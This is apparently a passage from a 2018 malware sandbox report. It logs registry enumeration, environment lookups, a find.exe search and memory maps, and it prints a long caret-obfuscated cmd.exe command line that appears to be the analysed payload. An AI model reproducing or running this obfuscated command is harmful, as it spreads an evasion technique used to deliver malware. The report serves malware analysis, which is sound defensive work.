| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 |
Module (10)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyW, address_out = 0x7feff0fbf20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:15 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 123833 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 |
Process #6: find.exe
0
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\find.exe |
| Command Line | fINd "SHCm" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0xb38 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| find.exe.mui | 0x00070000 | 0x00070fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| find.exe | 0xff390000 | 0xff397fff | Memory Mapped File | rwx |
|
|
|
- |
| ulib.dll | 0x7fee69a0000 | 0x7fee69c7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #7: cmd.exe
214
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^ |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:01:15, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb50 |
| Parent PID | 0xb1c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00707fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00890fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x01c9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01fe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x020effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x022f0000 | 0x025befff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
